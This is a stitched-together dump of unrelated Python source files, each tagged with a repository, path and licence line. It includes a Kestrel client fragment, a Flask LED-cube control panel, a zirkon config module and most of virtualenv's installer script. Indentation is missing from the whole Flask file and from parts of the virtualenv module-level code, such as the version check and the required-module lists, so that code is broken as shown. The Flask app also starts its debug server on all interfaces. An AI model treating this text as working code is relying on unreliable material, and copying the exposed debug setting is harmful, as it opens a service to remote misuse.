    def version(self):
        replies = []
        for server in self.servers:
            if server.connect():
                server.send_cmd('VERSION')
                replies.append(server.readline())
        return ('\n').join(replies).split(' ', 1)[1]

    def shutdown(self):
        for server in self.servers:
            if server.connect():
                server.send_cmd('SHUTDOWN')

    def __read_cmd(self, cmd):
        chunks = []
        for server in self.servers:
            if server.connect():
                server.send_cmd(cmd)
                chunks.append(self.__read_string(server))
        return ('\n').join(chunks)

    def __read_string(self, s):
        collected = []
        while True:
            line = s.readline()
            if not line or line.strip() == 'END':
                break
            collected.append(line)
        return ('\n').join(collected)
| empower/pykestrel | kestrel/client.py | Python | bsd-3-clause | 8,431 |
"""
The application file for the package
"""
from flask import Flask, render_template, jsonify
from cube import cube
app = Flask(__name__, template_folder='server/templates')
@app.route("/")
def index():
template_data = {
'site_title' : '8x8x8 LED Cube Operations',
'page_title' : 'LED Cube Control Panel'
}
return render_template('layout.html', **template_data)
@app.route("/about")
def about():
template_data = {
'site_title' : '8x8x8 LED Cube Operations',
'page_title' : 'LED Cube v1.0'
}
return render_template('about.html', **template_data)
@app.route("/cube-status", methods=['GET'])
def cube_status():
return jsonify(cube.status())
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8080, debug=True) | kamodev/8x8x8_RPi_Zero_LED_Cube | rpi_zero_ledcube/web_app.py | Python | mit | 779 |
from zirkon.program_config import ModuleConfig

# Module-wide configuration schema: two required integer options and one
# boolean defaulting to True.  The schema text below is parsed by zirkon;
# do not reformat it.
CONF = ModuleConfig("""
opt0 = Int()
opt1 = Int()
opt2 = Bool(default=True)
""")
def get_opt0():
    """Return the configured value of ``opt0``."""
    value = CONF["opt0"]
    return value
def get_opt1():
    """Return the configured value of ``opt1``."""
    value = CONF["opt1"]
    return value
def get_opt2():
    """Return the configured value of ``opt2`` (defaults to True)."""
    value = CONF["opt2"]
    return value
| simone-campagna/daikon | test_zirkon/pack0/comp0/__init__.py | Python | apache-2.0 | 254 |
#!/usr/bin/env python
"""Create a "virtual" Python installation
"""
__version__ = "13.1.2"
virtualenv_version = __version__ # legacy
import base64
import sys
import os
import codecs
import optparse
import re
import shutil
import logging
import tempfile
import zlib
import errno
import glob
import distutils.sysconfig
from distutils.util import strtobool
import struct
import subprocess
import tarfile
if sys.version_info < (2, 6):
print('ERROR: %s' % sys.exc_info()[1])
print('ERROR: this script requires Python 2.6 or greater.')
sys.exit(101)
try:
basestring
except NameError:
basestring = str
try:
import ConfigParser
except ImportError:
import configparser as ConfigParser
join = os.path.join
py_version = 'python%s.%s' % (sys.version_info[0], sys.version_info[1])
is_jython = sys.platform.startswith('java')
is_pypy = hasattr(sys, 'pypy_version_info')
is_win = (sys.platform == 'win32')
is_cygwin = (sys.platform == 'cygwin')
is_darwin = (sys.platform == 'darwin')
abiflags = getattr(sys, 'abiflags', '')
user_dir = os.path.expanduser('~')
# Per-user storage location for virtualenv's config file; a hidden dot
# directory on POSIX, a plain directory on Windows.
if is_win:
    default_storage_dir = os.path.join(user_dir, 'virtualenv')
else:
    default_storage_dir = os.path.join(user_dir, '.virtualenv')
default_config_file = os.path.join(default_storage_dir, 'virtualenv.ini')

# Name of the interpreter executable expected inside the created env.
if is_pypy:
    expected_exe = 'pypy'
elif is_jython:
    expected_exe = 'jython'
else:
    expected_exe = 'python'
# Return a mapping of version -> Python executable
# Only provided for Windows, where the information in the registry is used
if not is_win:
    def get_installed_pythons():
        """Non-Windows stub: there is no registry to consult, so report
        no installed interpreters."""
        return {}
else:
    try:
        import winreg
    except ImportError:
        import _winreg as winreg  # Python 2 name for the same module

    def get_installed_pythons():
        """Return {version string: python.exe path} read from the Windows
        registry (HKLM\\Software\\Python\\PythonCore)."""
        try:
            python_core = winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
                    "Software\\Python\\PythonCore")
        except WindowsError:
            # No registered Python installations
            return {}
        i = 0
        versions = []
        while True:
            try:
                versions.append(winreg.EnumKey(python_core, i))
                i = i + 1
            except WindowsError:
                # EnumKey raises when we run past the last subkey
                break
        exes = dict()
        for ver in versions:
            try:
                path = winreg.QueryValue(python_core, "%s\\InstallPath" % ver)
            except WindowsError:
                continue
            exes[ver] = join(path, "python.exe")
        winreg.CloseKey(python_core)
        # Add the major versions
        # Sort the keys, then repeatedly update the major version entry
        # Last executable (i.e., highest version) wins with this approach
        for ver in sorted(exes):
            exes[ver[0]] = exes[ver]
        return exes
REQUIRED_MODULES = ['os', 'posix', 'posixpath', 'nt', 'ntpath', 'genericpath',
'fnmatch', 'locale', 'encodings', 'codecs',
'stat', 'UserDict', 'readline', 'copy_reg', 'types',
're', 'sre', 'sre_parse', 'sre_constants', 'sre_compile',
'zlib']
REQUIRED_FILES = ['lib-dynload', 'config']
majver, minver = sys.version_info[:2]
if majver == 2:
if minver >= 6:
REQUIRED_MODULES.extend(['warnings', 'linecache', '_abcoll', 'abc'])
if minver >= 7:
REQUIRED_MODULES.extend(['_weakrefset'])
elif majver == 3:
# Some extra modules are needed for Python 3, but different ones
# for different versions.
REQUIRED_MODULES.extend(['_abcoll', 'warnings', 'linecache', 'abc', 'io',
'_weakrefset', 'copyreg', 'tempfile', 'random',
'__future__', 'collections', 'keyword', 'tarfile',
'shutil', 'struct', 'copy', 'tokenize', 'token',
'functools', 'heapq', 'bisect', 'weakref',
'reprlib'])
if minver >= 2:
REQUIRED_FILES[-1] = 'config-%s' % majver
if minver >= 3:
import sysconfig
platdir = sysconfig.get_config_var('PLATDIR')
REQUIRED_FILES.append(platdir)
# The whole list of 3.3 modules is reproduced below - the current
# uncommented ones are required for 3.3 as of now, but more may be
# added as 3.3 development continues.
REQUIRED_MODULES.extend([
#"aifc",
#"antigravity",
#"argparse",
#"ast",
#"asynchat",
#"asyncore",
"base64",
#"bdb",
#"binhex",
#"bisect",
#"calendar",
#"cgi",
#"cgitb",
#"chunk",
#"cmd",
#"codeop",
#"code",
#"colorsys",
#"_compat_pickle",
#"compileall",
#"concurrent",
#"configparser",
#"contextlib",
#"cProfile",
#"crypt",
#"csv",
#"ctypes",
#"curses",
#"datetime",
#"dbm",
#"decimal",
#"difflib",
#"dis",
#"doctest",
#"dummy_threading",
"_dummy_thread",
#"email",
#"filecmp",
#"fileinput",
#"formatter",
#"fractions",
#"ftplib",
#"functools",
#"getopt",
#"getpass",
#"gettext",
#"glob",
#"gzip",
"hashlib",
#"heapq",
"hmac",
#"html",
#"http",
#"idlelib",
#"imaplib",
#"imghdr",
"imp",
"importlib",
#"inspect",
#"json",
#"lib2to3",
#"logging",
#"macpath",
#"macurl2path",
#"mailbox",
#"mailcap",
#"_markupbase",
#"mimetypes",
#"modulefinder",
#"multiprocessing",
#"netrc",
#"nntplib",
#"nturl2path",
#"numbers",
#"opcode",
#"optparse",
#"os2emxpath",
#"pdb",
#"pickle",
#"pickletools",
#"pipes",
#"pkgutil",
#"platform",
#"plat-linux2",
#"plistlib",
#"poplib",
#"pprint",
#"profile",
#"pstats",
#"pty",
#"pyclbr",
#"py_compile",
#"pydoc_data",
#"pydoc",
#"_pyio",
#"queue",
#"quopri",
#"reprlib",
"rlcompleter",
#"runpy",
#"sched",
#"shelve",
#"shlex",
#"smtpd",
#"smtplib",
#"sndhdr",
#"socket",
#"socketserver",
#"sqlite3",
#"ssl",
#"stringprep",
#"string",
#"_strptime",
#"subprocess",
#"sunau",
#"symbol",
#"symtable",
#"sysconfig",
#"tabnanny",
#"telnetlib",
#"test",
#"textwrap",
#"this",
#"_threading_local",
#"threading",
#"timeit",
#"tkinter",
#"tokenize",
#"token",
#"traceback",
#"trace",
#"tty",
#"turtledemo",
#"turtle",
#"unittest",
#"urllib",
#"uuid",
#"uu",
#"wave",
#"weakref",
#"webbrowser",
#"wsgiref",
#"xdrlib",
#"xml",
#"xmlrpc",
#"zipfile",
])
if minver >= 4:
REQUIRED_MODULES.extend([
'operator',
'_collections_abc',
'_bootlocale',
])
if is_pypy:
# these are needed to correctly display the exceptions that may happen
# during the bootstrap
REQUIRED_MODULES.extend(['traceback', 'linecache'])
class Logger(object):
    """
    Logging object for use in command-line script.  Allows ranges of
    levels, to avoid some redundancy of displayed information.

    Consumers are (level, consumer) pairs, where the consumer is either a
    stream (anything with a ``write`` method) or a callable that receives
    the rendered message.  The only behavioral change from the historic
    version is the use of the ``@classmethod`` decorator (the script
    already requires Python >= 2.6) instead of the pre-2.4
    ``name = classmethod(name)`` idiom.
    """

    DEBUG = logging.DEBUG
    INFO = logging.INFO
    NOTIFY = (logging.INFO + logging.WARN) / 2
    WARN = WARNING = logging.WARN
    ERROR = logging.ERROR
    FATAL = logging.FATAL

    # Ordered list used by level_for_integer() to clamp verbosity indexes.
    LEVELS = [DEBUG, INFO, NOTIFY, WARN, ERROR, FATAL]

    def __init__(self, consumers):
        self.consumers = consumers
        self.indent = 0
        # Progress state: while a start_progress() message sits on screen
        # without a trailing newline, in_progress_hanging is true.
        self.in_progress = None
        self.in_progress_hanging = False

    def debug(self, msg, *args, **kw):
        self.log(self.DEBUG, msg, *args, **kw)

    def info(self, msg, *args, **kw):
        self.log(self.INFO, msg, *args, **kw)

    def notify(self, msg, *args, **kw):
        self.log(self.NOTIFY, msg, *args, **kw)

    def warn(self, msg, *args, **kw):
        self.log(self.WARN, msg, *args, **kw)

    def error(self, msg, *args, **kw):
        self.log(self.ERROR, msg, *args, **kw)

    def fatal(self, msg, *args, **kw):
        self.log(self.FATAL, msg, *args, **kw)

    def log(self, level, msg, *args, **kw):
        """Render ``msg`` (%-style, with positional *or* keyword args) and
        hand it to every consumer whose level accepts ``level``."""
        if args:
            if kw:
                raise TypeError(
                    "You may give positional or keyword arguments, not both")
        args = args or kw
        rendered = None
        for consumer_level, consumer in self.consumers:
            if self.level_matches(level, consumer_level):
                # Terminate a hanging progress line before writing anything
                # else to the console.
                if (self.in_progress_hanging
                        and consumer in (sys.stdout, sys.stderr)):
                    self.in_progress_hanging = False
                    sys.stdout.write('\n')
                    sys.stdout.flush()
                if rendered is None:
                    if args:
                        rendered = msg % args
                    else:
                        rendered = msg
                    rendered = ' ' * self.indent + rendered
                if hasattr(consumer, 'write'):
                    consumer.write(rendered + '\n')
                else:
                    consumer(rendered)

    def start_progress(self, msg):
        """Begin a progress message (``msg`` stays on screen; dots follow)."""
        assert not self.in_progress, (
            "Tried to start_progress(%r) while in_progress %r"
            % (msg, self.in_progress))
        if self.level_matches(self.NOTIFY, self._stdout_level()):
            sys.stdout.write(msg)
            sys.stdout.flush()
            self.in_progress_hanging = True
        else:
            self.in_progress_hanging = False
        self.in_progress = msg

    def end_progress(self, msg='done.'):
        """Finish the current progress message with ``msg``."""
        assert self.in_progress, (
            "Tried to end_progress without start_progress")
        if self.stdout_level_matches(self.NOTIFY):
            if not self.in_progress_hanging:
                # Some message has been printed out since start_progress
                sys.stdout.write('...' + self.in_progress + msg + '\n')
                sys.stdout.flush()
            else:
                sys.stdout.write(msg + '\n')
                sys.stdout.flush()
        self.in_progress = None
        self.in_progress_hanging = False

    def show_progress(self):
        """If we are in a progress scope, and no log messages have been
        shown, write out another '.'"""
        if self.in_progress_hanging:
            sys.stdout.write('.')
            sys.stdout.flush()

    def stdout_level_matches(self, level):
        """Returns true if a message at this level will go to stdout"""
        return self.level_matches(level, self._stdout_level())

    def _stdout_level(self):
        """Returns the level that stdout runs at"""
        for level, consumer in self.consumers:
            if consumer is sys.stdout:
                return level
        return self.FATAL

    def level_matches(self, level, consumer_level):
        """
        >>> l = Logger([])
        >>> l.level_matches(3, 4)
        False
        >>> l.level_matches(3, 2)
        True
        >>> l.level_matches(slice(None, 3), 3)
        False
        >>> l.level_matches(slice(None, 3), 2)
        True
        >>> l.level_matches(slice(1, 3), 1)
        True
        >>> l.level_matches(slice(2, 3), 1)
        False
        """
        if isinstance(level, slice):
            start, stop = level.start, level.stop
            if start is not None and start > consumer_level:
                return False
            if stop is not None and stop <= consumer_level:
                return False
            return True
        else:
            return level >= consumer_level

    @classmethod
    def level_for_integer(cls, level):
        """Clamp an integer verbosity index into the LEVELS list."""
        levels = cls.LEVELS
        if level < 0:
            return levels[0]
        if level >= len(levels):
            return levels[-1]
        return levels[level]
# create a silent logger just to prevent this from being undefined
# will be overridden with requested verbosity main() is called.
logger = Logger([(Logger.LEVELS[-1], sys.stdout)])
def mkdir(path):
    """Create ``path`` (including parents) unless it already exists."""
    if os.path.exists(path):
        logger.info('Directory %s already exists', path)
    else:
        logger.info('Creating %s', path)
        os.makedirs(path)
def copyfileordir(src, dest, symlink=True):
    """Copy a single file or an entire directory tree from src to dest.

    For directories, ``symlink`` is forwarded to shutil.copytree as its
    ``symlinks`` flag (preserve links instead of following them).
    """
    if not os.path.isdir(src):
        shutil.copy2(src, dest)
    else:
        shutil.copytree(src, dest, symlink)
def copyfile(src, dest, symlink=True):
    """Symlink or copy ``src`` to ``dest``, creating parent dirs as needed.

    Existing destinations are left untouched; dangling source symlinks are
    skipped with a warning.  Symlinking is preferred unless disabled or
    unsupported, in which case the file/tree is copied instead.
    """
    if not os.path.exists(src):
        # Some bad symlink in the src
        logger.warn('Cannot find file %s (bad symlink)', src)
        return
    if os.path.exists(dest):
        logger.debug('File %s already exists', dest)
        return
    parent = os.path.dirname(dest)
    if not os.path.exists(parent):
        logger.info('Creating parent directories for %s', os.path.dirname(dest))
        os.makedirs(parent)
    if os.path.islink(src):
        srcpath = os.readlink(src)
    else:
        srcpath = os.path.abspath(src)
    if symlink and hasattr(os, 'symlink') and not is_win:
        logger.info('Symlinking %s', dest)
        try:
            os.symlink(srcpath, dest)
        except (OSError, NotImplementedError):
            logger.info('Symlinking failed, copying to %s', dest)
            copyfileordir(src, dest, symlink)
    else:
        logger.info('Copying to %s', dest)
        copyfileordir(src, dest, symlink)
def writefile(dest, content, overwrite=True):
    """Write ``content`` (utf-8 encoded) to ``dest``.

    If the file already exists with different content, it is rewritten only
    when ``overwrite`` is true; identical content is left untouched.
    """
    encoded = content.encode('utf-8')
    if not os.path.exists(dest):
        logger.info('Writing %s', dest)
        f = open(dest, 'wb')
        f.write(encoded)
        f.close()
        return
    f = open(dest, 'rb')
    existing = f.read()
    f.close()
    if existing == content.encode("utf-8"):
        logger.info('Content %s already in place', dest)
    elif not overwrite:
        logger.notify('File %s exists with different content; not overwriting', dest)
    else:
        logger.notify('Overwriting %s with new content', dest)
        f = open(dest, 'wb')
        f.write(encoded)
        f.close()
def rmtree(dir):
    """Recursively delete ``dir`` when it exists; log either way."""
    if not os.path.exists(dir):
        logger.info('Do not need to delete %s; already gone', dir)
        return
    logger.notify('Deleting tree %s', dir)
    shutil.rmtree(dir)
def make_exe(fn):
    """Give ``fn`` read/execute permission bits (no-op without os.chmod)."""
    if not hasattr(os, 'chmod'):
        return
    oldmode = os.stat(fn).st_mode & 0xFFF  # 0o7777
    newmode = (oldmode | 0x16D) & 0xFFF  # 0o555, 0o7777
    os.chmod(fn, newmode)
    logger.info('Changed mode of %s to %s', fn, oct(newmode))
def _find_file(filename, dirs):
    """Search ``dirs`` from last to first for ``filename`` (a glob pattern).

    Returns ``(True, path)`` for the first regular-file match, otherwise
    ``(False, filename)``.
    """
    for directory in reversed(dirs):
        matches = glob.glob(os.path.join(directory, filename))
        if matches and os.path.isfile(matches[0]):
            return True, matches[0]
    return False, filename
def file_search_dirs():
    """Return the existing directories searched for bundled support files
    (setuptools/pip/wheel wheels): this script's directory, its
    ``virtualenv_support`` subdir, and — for bootstrap scripts — the
    support dir of an installed virtualenv package."""
    here = os.path.dirname(os.path.abspath(__file__))
    dirs = [here, join(here, 'virtualenv_support')]
    # NOTE(review): splitext() of a *dirname* can never equal 'virtualenv';
    # this was presumably meant to inspect the basename of __file__.
    # Confirm before changing — as written the branch is always taken and
    # the extra dir is appended harmlessly when virtualenv is importable.
    if os.path.splitext(os.path.dirname(__file__))[0] != 'virtualenv':
        # Probably some boot script; just in case virtualenv is installed...
        try:
            import virtualenv
        except ImportError:
            pass
        else:
            dirs.append(os.path.join(
                os.path.dirname(virtualenv.__file__), 'virtualenv_support'))
    return [d for d in dirs if os.path.isdir(d)]
class UpdatingDefaultsHelpFormatter(optparse.IndentedHelpFormatter):
    """
    Custom help formatter for use in ConfigOptionParser that updates
    the defaults before expanding them, allowing them to show up correctly
    in the help listing
    """

    def expand_default(self, option):
        parser = self.parser
        if parser is not None:
            parser.update_defaults(parser.defaults)
        return optparse.IndentedHelpFormatter.expand_default(self, option)
class ConfigOptionParser(optparse.OptionParser):
    """
    Custom option parser which updates its defaults by checking the
    configuration files and environmental variables
    """

    def __init__(self, *args, **kwargs):
        self.config = ConfigParser.RawConfigParser()
        self.files = self.get_config_files()
        self.config.read(self.files)
        optparse.OptionParser.__init__(self, *args, **kwargs)

    def get_config_files(self):
        # An explicit, existing file named by $VIRTUALENV_CONFIG_FILE wins
        # over the per-user default location.
        config_file = os.environ.get('VIRTUALENV_CONFIG_FILE', False)
        if config_file and os.path.exists(config_file):
            return [config_file]
        return [default_config_file]

    def update_defaults(self, defaults):
        """
        Updates the given defaults with values from the config files and
        the environ. Does a little special handling for certain types of
        options (lists).
        """
        # Then go and look for the other sources of configuration:
        config = {}
        # 1. config files
        config.update(dict(self.get_config_section('virtualenv')))
        # 2. environmental variables (these override config-file values)
        config.update(dict(self.get_environ_vars()))
        # Then set the options with those values
        for key, val in config.items():
            key = key.replace('_', '-')
            if not key.startswith('--'):
                key = '--%s' % key  # only prefer long opts
            option = self.get_option(key)
            if option is not None:
                # ignore empty values
                if not val:
                    continue
                # handle multiline configs
                if option.action == 'append':
                    val = val.split()
                else:
                    option.nargs = 1
                # boolean-flag options take textual true/false values here
                if option.action == 'store_false':
                    val = not strtobool(val)
                elif option.action in ('store_true', 'count'):
                    val = strtobool(val)
                try:
                    val = option.convert_value(key, val)
                except optparse.OptionValueError:
                    e = sys.exc_info()[1]
                    print("An error occurred during configuration: %s" % e)
                    sys.exit(3)
                defaults[option.dest] = val
        return defaults

    def get_config_section(self, name):
        """
        Get a section of a configuration
        """
        if self.config.has_section(name):
            return self.config.items(name)
        return []

    def get_environ_vars(self, prefix='VIRTUALENV_'):
        """
        Returns a generator with all environmental vars with prefix VIRTUALENV
        """
        for key, val in os.environ.items():
            if key.startswith(prefix):
                yield (key.replace(prefix, '').lower(), val)

    def get_default_values(self):
        """
        Overridding to make updating the defaults after instantiation of
        the option parser possible, update_defaults() does the dirty work.
        """
        if not self.process_default_values:
            # Old, pre-Optik 1.5 behaviour.
            return optparse.Values(self.defaults)

        defaults = self.update_defaults(self.defaults.copy())  # ours
        for option in self._get_all_options():
            default = defaults.get(option.dest)
            if isinstance(default, basestring):
                opt_str = option.get_opt_string()
                defaults[option.dest] = option.check_value(opt_str, default)
        return optparse.Values(defaults)
def main():
    """Command-line entry point for virtualenv.

    Builds the option parser, handles the re-exec dance for ``--python``,
    validates DEST_DIR, then delegates to create_environment() (or
    make_environment_relocatable() when --relocatable is given).
    """
    parser = ConfigOptionParser(
        version=virtualenv_version,
        usage="%prog [OPTIONS] DEST_DIR",
        formatter=UpdatingDefaultsHelpFormatter())

    parser.add_option(
        '-v', '--verbose',
        action='count',
        dest='verbose',
        default=0,
        help="Increase verbosity.")

    parser.add_option(
        '-q', '--quiet',
        action='count',
        dest='quiet',
        default=0,
        help='Decrease verbosity.')

    parser.add_option(
        '-p', '--python',
        dest='python',
        metavar='PYTHON_EXE',
        help='The Python interpreter to use, e.g., --python=python2.5 will use the python2.5 '
        'interpreter to create the new environment. The default is the interpreter that '
        'virtualenv was installed with (%s)' % sys.executable)

    parser.add_option(
        '--clear',
        dest='clear',
        action='store_true',
        help="Clear out the non-root install and start from scratch.")

    parser.set_defaults(system_site_packages=False)
    parser.add_option(
        '--no-site-packages',
        dest='system_site_packages',
        action='store_false',
        help="DEPRECATED. Retained only for backward compatibility. "
        "Not having access to global site-packages is now the default behavior.")

    parser.add_option(
        '--system-site-packages',
        dest='system_site_packages',
        action='store_true',
        help="Give the virtual environment access to the global site-packages.")

    parser.add_option(
        '--always-copy',
        dest='symlink',
        action='store_false',
        default=True,
        help="Always copy files rather than symlinking.")

    parser.add_option(
        '--unzip-setuptools',
        dest='unzip_setuptools',
        action='store_true',
        help="Unzip Setuptools when installing it.")

    parser.add_option(
        '--relocatable',
        dest='relocatable',
        action='store_true',
        help='Make an EXISTING virtualenv environment relocatable. '
        'This fixes up scripts and makes all .pth files relative.')

    parser.add_option(
        '--no-setuptools',
        dest='no_setuptools',
        action='store_true',
        help='Do not install setuptools (or pip) in the new virtualenv.')

    parser.add_option(
        '--no-pip',
        dest='no_pip',
        action='store_true',
        help='Do not install pip in the new virtualenv.')

    parser.add_option(
        '--no-wheel',
        dest='no_wheel',
        action='store_true',
        help='Do not install wheel in the new virtualenv.')

    default_search_dirs = file_search_dirs()
    parser.add_option(
        '--extra-search-dir',
        dest="search_dirs",
        action="append",
        metavar='DIR',
        default=default_search_dirs,
        help="Directory to look for setuptools/pip distributions in. "
        "This option can be used multiple times.")

    parser.add_option(
        '--never-download',
        dest="never_download",
        action="store_true",
        default=True,
        help="DEPRECATED. Retained only for backward compatibility. This option has no effect. "
        "Virtualenv never downloads pip or setuptools.")

    parser.add_option(
        '--prompt',
        dest='prompt',
        help='Provides an alternative prompt prefix for this environment.')

    parser.add_option(
        '--setuptools',
        dest='setuptools',
        action='store_true',
        help="DEPRECATED. Retained only for backward compatibility. This option has no effect.")

    parser.add_option(
        '--distribute',
        dest='distribute',
        action='store_true',
        help="DEPRECATED. Retained only for backward compatibility. This option has no effect.")

    # Bootstrap scripts generated from virtualenv may define
    # extend_parser/adjust_options/after_install hooks at module level.
    if 'extend_parser' in globals():
        extend_parser(parser)

    options, args = parser.parse_args()

    global logger

    if 'adjust_options' in globals():
        adjust_options(options, args)

    # Map -v/-q counts onto the Logger level table (default is NOTIFY).
    verbosity = options.verbose - options.quiet
    logger = Logger([(Logger.level_for_integer(2 - verbosity), sys.stdout)])

    if options.python and not os.environ.get('VIRTUALENV_INTERPRETER_RUNNING'):
        # Re-run this script under the interpreter named by --python; the
        # environment flag guards against re-exec recursion.
        env = os.environ.copy()
        interpreter = resolve_interpreter(options.python)
        if interpreter == sys.executable:
            logger.warn('Already using interpreter %s' % interpreter)
        else:
            logger.notify('Running virtualenv with interpreter %s' % interpreter)
            env['VIRTUALENV_INTERPRETER_RUNNING'] = 'true'
            file = __file__
            if file.endswith('.pyc'):
                file = file[:-1]
            popen = subprocess.Popen([interpreter, file] + sys.argv[1:], env=env)
            raise SystemExit(popen.wait())

    if not args:
        print('You must provide a DEST_DIR')
        parser.print_help()
        sys.exit(2)
    if len(args) > 1:
        print('There must be only one argument: DEST_DIR (you gave %s)' % (
            ' '.join(args)))
        parser.print_help()
        sys.exit(2)

    home_dir = args[0]

    if os.environ.get('WORKING_ENV'):
        logger.fatal('ERROR: you cannot run virtualenv while in a workingenv')
        logger.fatal('Please deactivate your workingenv, then re-run this script')
        sys.exit(3)

    if 'PYTHONHOME' in os.environ:
        # PYTHONHOME would redirect the new interpreter's stdlib lookup.
        logger.warn('PYTHONHOME is set. You *must* activate the virtualenv before using it')
        del os.environ['PYTHONHOME']

    if options.relocatable:
        make_environment_relocatable(home_dir)
        return

    if not options.never_download:
        logger.warn('The --never-download option is for backward compatibility only.')
        logger.warn('Setting it to false is no longer supported, and will be ignored.')

    create_environment(home_dir,
                       site_packages=options.system_site_packages,
                       clear=options.clear,
                       unzip_setuptools=options.unzip_setuptools,
                       prompt=options.prompt,
                       search_dirs=options.search_dirs,
                       never_download=True,
                       no_setuptools=options.no_setuptools,
                       no_pip=options.no_pip,
                       no_wheel=options.no_wheel,
                       symlink=options.symlink)
    if 'after_install' in globals():
        after_install(options, home_dir)
def call_subprocess(cmd, show_stdout=True,
                    filter_stdout=None, cwd=None,
                    raise_on_returncode=True, extra_env=None,
                    remove_from_env=None):
    """Run ``cmd`` (a list), routing its output through the module logger.

    :param show_stdout: when true the child writes straight to the console;
        otherwise stdout+stderr are captured and logged line by line.
    :param filter_stdout: optional callable mapping an output line to a log
        level, or to a ``(level, replacement_line)`` tuple.
    :param raise_on_returncode: raise ``OSError`` on a non-zero exit code
        instead of merely logging a warning.
    :param extra_env: mapping merged into the child's environment.
    :param remove_from_env: iterable of variable names to drop from it.
    """
    # Build a human-readable rendition of the command for log messages:
    # long arguments are elided and ones containing spaces/quotes quoted.
    cmd_parts = []
    for part in cmd:
        if len(part) > 45:
            part = part[:20]+"..."+part[-20:]
        if ' ' in part or '\n' in part or '"' in part or "'" in part:
            part = '"%s"' % part.replace('"', '\\"')
        if hasattr(part, 'decode'):
            # Python 2 byte strings: decode for display purposes only
            try:
                part = part.decode(sys.getdefaultencoding())
            except UnicodeDecodeError:
                part = part.decode(sys.getfilesystemencoding())
        cmd_parts.append(part)
    cmd_desc = ' '.join(cmd_parts)
    if show_stdout:
        stdout = None
    else:
        stdout = subprocess.PIPE
    logger.debug("Running command %s" % cmd_desc)
    if extra_env or remove_from_env:
        env = os.environ.copy()
        if extra_env:
            env.update(extra_env)
        if remove_from_env:
            for varname in remove_from_env:
                env.pop(varname, None)
    else:
        # env=None means "inherit the parent environment unchanged"
        env = None
    try:
        proc = subprocess.Popen(
            cmd, stderr=subprocess.STDOUT, stdin=None, stdout=stdout,
            cwd=cwd, env=env)
    except Exception:
        e = sys.exc_info()[1]
        logger.fatal(
            "Error %s while executing command %s" % (e, cmd_desc))
        raise
    all_output = []
    if stdout is not None:
        # Captured mode: read, decode and log one line at a time so
        # progress dots can be emitted for suppressed lines.
        stdout = proc.stdout
        encoding = sys.getdefaultencoding()
        fs_encoding = sys.getfilesystemencoding()
        while 1:
            line = stdout.readline()
            try:
                line = line.decode(encoding)
            except UnicodeDecodeError:
                line = line.decode(fs_encoding)
            if not line:
                break
            line = line.rstrip()
            all_output.append(line)
            if filter_stdout:
                level = filter_stdout(line)
                if isinstance(level, tuple):
                    level, line = level
                logger.log(level, line)
                if not logger.stdout_level_matches(level):
                    logger.show_progress()
            else:
                logger.info(line)
    else:
        proc.communicate()
    proc.wait()
    if proc.returncode:
        if raise_on_returncode:
            if all_output:
                logger.notify('Complete output from command %s:' % cmd_desc)
                logger.notify('\n'.join(all_output) + '\n----------------------------------------')
            raise OSError(
                "Command %s failed with error code %s"
                % (cmd_desc, proc.returncode))
        else:
            logger.warn(
                "Command %s had error code %s"
                % (cmd_desc, proc.returncode))
def filter_install_output(line):
    """Log-level filter for pip/setuptools output: demote 'running ...'
    progress lines to DEBUG, keep everything else at INFO."""
    return Logger.INFO if line.strip().startswith('running') else Logger.DEBUG
def find_wheels(projects, search_dirs):
    """Find wheels from which we can import PROJECTS.

    Scan through SEARCH_DIRS for a wheel for each PROJECT in turn. Return
    a list of the first wheel found for each PROJECT
    """
    wheels = []
    # Look through SEARCH_DIRS for the first suitable wheel. Don't bother
    # about version checking here, as this is simply to get something we can
    # then use to install the correct version.
    for project in projects:
        for dirname in search_dirs:
            # This relies on only having "universal" wheels available.
            # The pattern could be tightened to require -py2.py3-none-any.whl.
            candidates = glob.glob(os.path.join(dirname, project + '-*.whl'))
            if candidates:
                wheels.append(os.path.abspath(candidates[0]))
                break
        else:
            # We're out of luck, so quit with a suitable error
            # NOTE(review): this logs a fatal message but still falls
            # through and returns the incomplete list — confirm intended.
            logger.fatal('Cannot find a wheel for %s' % (project,))
    return wheels
def install_wheel(project_names, py_executable, search_dirs=None):
    """Install ``project_names`` into the new environment using pip.

    pip/setuptools are bootstrapped by placing their wheel files directly
    on PYTHONPATH, then ``pip install`` runs inside the target interpreter
    restricted to wheels found under ``search_dirs`` (no network access).
    """
    if search_dirs is None:
        search_dirs = file_search_dirs()

    wheels = find_wheels(['setuptools', 'pip'], search_dirs)
    pythonpath = os.pathsep.join(wheels)
    findlinks = ' '.join(search_dirs)

    cmd = [
        py_executable, '-c',
        'import sys, pip; sys.exit(pip.main(["install", "--ignore-installed"] + sys.argv[1:]))',
    ] + project_names
    logger.start_progress('Installing %s...' % (', '.join(project_names)))
    logger.indent += 2
    try:
        # PIP_NO_INDEX + PIP_FIND_LINKS confine pip to the local wheels.
        call_subprocess(cmd, show_stdout=False,
            extra_env = {
                'PYTHONPATH': pythonpath,
                'JYTHONPATH': pythonpath,  # for Jython < 3.x
                'PIP_FIND_LINKS': findlinks,
                'PIP_USE_WHEEL': '1',
                'PIP_PRE': '1',
                'PIP_NO_INDEX': '1'
            }
        )
    finally:
        logger.indent -= 2
        logger.end_progress()
def create_environment(home_dir, site_packages=False, clear=False,
                       unzip_setuptools=False,
                       prompt=None, search_dirs=None, never_download=False,
                       no_setuptools=False, no_pip=False, no_wheel=False,
                       symlink=True):
    """
    Creates a new environment in ``home_dir``.

    If ``site_packages`` is true, then the global ``site-packages/``
    directory will be on the path.

    If ``clear`` is true (default False) then the environment will
    first be cleared.

    ``never_download`` is accepted for backward compatibility only;
    ``symlink=False`` forces copying instead of symlinking.
    """
    home_dir, lib_dir, inc_dir, bin_dir = path_locations(home_dir)

    # Lay down the interpreter and bootstrap stdlib first...
    py_executable = os.path.abspath(install_python(
        home_dir, lib_dir, inc_dir, bin_dir,
        site_packages=site_packages, clear=clear, symlink=symlink))

    install_distutils(home_dir)

    # ...then the packaging tools from bundled wheels...
    if not no_setuptools:
        to_install = ['setuptools']
        if not no_pip:
            to_install.append('pip')
        if not no_wheel:
            to_install.append('wheel')
        install_wheel(to_install, py_executable, search_dirs)

    # ...and finally the activate scripts.
    install_activate(home_dir, bin_dir, prompt)
def is_executable_file(fpath):
    """True when ``fpath`` is a regular file with the execute bit set."""
    return os.access(fpath, os.X_OK) and os.path.isfile(fpath)
def path_locations(home_dir):
    """Return the path locations for the environment (where libraries are,
    where scripts go, etc)

